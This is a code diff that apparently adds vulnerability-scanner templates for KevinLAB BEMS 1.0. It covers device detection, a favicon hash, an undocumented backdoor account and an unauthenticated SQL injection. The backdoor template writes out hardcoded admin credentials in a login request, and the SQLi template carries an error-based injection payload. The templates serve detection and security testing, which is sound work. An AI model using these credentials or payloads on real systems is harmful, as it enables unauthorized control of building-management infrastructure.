Merge pull request #2148 from gy741/rule-add-v34

Add KevinLAB BEMS 1.0 Multiple Vulnerabilities

iot/kevinlab-device-detect.yaml

@@ -0,0 +1,30 @@
+id: kevinlab-device-detect
+
+info:
+  name: KevinLAB Devices Detection
+  description: KevinLab is a venture company specialized in IoT, Big Data, A.I based energy management platform. KevinLAB's BEMS (Building Energy Management System) enables efficient energy management in buildings. It improves the efficient of energy use by collecting and analyzing various information of energy usage and facilities in the building. It also manages energy usage, facility efficiency and indoor environment control.
+  author: gy741
+  severity: info
+  tags: iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/pages/"
+      - "{{BaseURL}}/dashboard/"
+
+    matchers-condition: or
+    matchers:
+      - type: word
+        words:
+          - '<title>BEMS</title>'
+          - '../http/index.php'
+        part: body
+        condition: and
+
+      - type: word
+        words:
+          - '<title>HEMS</title>'
+          - '../dashboard/proc.php'
+        part: body
+        condition: and

technologies/favicon-detection.yaml

@@ -2036,3 +2036,7 @@ requests:
         name: "SpamSniper"
         dsl:
           - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))"
+      - type: dsl
+        name: "KevinLAB"
+        dsl:
+          - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))"

vulnerabilities/other/kevinlab-bems-backdoor.yaml

@@ -0,0 +1,41 @@
+id: kevinlab-bems-backdoor
+
+info:
+  name: KevinLAB BEMS (Building Energy Management System) Undocumented Backdoor Account
+  author: gy741
+  severity: critical
+  description: The BEMS solution has an undocumented backdoor account and these sets of credentials are never exposed to the end-user and cannot be changed through any normal operation of the solution thru the RMI. Attacker could exploit this vulnerability by logging in using the backdoor account with highest privileges for administration and gain full system control. The backdoor user cannot be seen in the users settings in the admin panel and it also uses an undocumented privilege level (admin_pk=1) which allows full availability of the features that the BEMS is offering remotely.
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5654.php
+  tags: kevinlab
+
+requests:
+  - raw:
+      - |
+        POST /http/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+        requester=login&request=login&params=%5B%7B%22name%22%3A%22input_id%22%2C%22value%22%3A%22kevinlab%22%7D%2C%7B%22name%22%3A%22input_passwd%22%2C%22value%22%3A%22kevin003%22%7D%2C%7B%22name%22%3A%22device_key%22%2C%22value%22%3A%22a2fe6b53-e09d-46df-8c9a-e666430e163e%22%7D%2C%7B%22name%22%3A%22auto_login%22%2C%22value%22%3Afalse%7D%2C%7B%22name%22%3A%22login_key%22%2C%22value%22%3A%22%22%7D%5D
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        regex:
+          - 'data":"[A-Za-z0-9-]+'
+          - 'login_key":"[A-Za-z0-9-]+'
+        part: body
+        condition: or
+
+      - type: word
+        words:
+          - '"result":true'
+        part: body
+
+      - type: status
+        status:
+          - 200

vulnerabilities/other/kevinlab-bems-sqli.yaml

@@ -0,0 +1,37 @@
+id: kevinlab-bems-sqli
+
+info:
+  name: KevinLAB BEMS 1.0 Unauthenticated SQL Injection/Authentication Bypass
+  author: gy741
+  severity: high
+  description: The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through 'input_id' POST parameter in '/http/index.php' is not properly sanitised before being returned to the user or used in SQL queries.
+  reference: |
+    - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5655.php
+    - https://www.exploit-db.com/exploits/50146
+    - https://packetstormsecurity.com/files/163572/
+  tags: kevinlab,sqli
+
+requests:
+  - raw:
+      - |
+        POST /http/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Accept: application/json, text/javascript, */*; q=0.01
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        Accept-Encoding: gzip, deflate
+        Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
+        Connection: close
+
+        requester=login&request=login&params=[{"name":"input_id","value":"USERNAME' AND EXTRACTVALUE(1337,CONCAT(0x5C,0x5A534C,(SELECT (ELT(1337=1337,1))),0x5A534C)) AND 'joxy'='joxy"},{"name":"input_passwd","value":"PASSWORD"},{"name":"device_id","value":"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"},{"name":"checked","value":false},{"name":"login_key","value":""}]
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "XPATH syntax error"
+          - ": '\\ZSL1ZSL'"
+        condition: and
+      - type: status
+        status:
+          - 200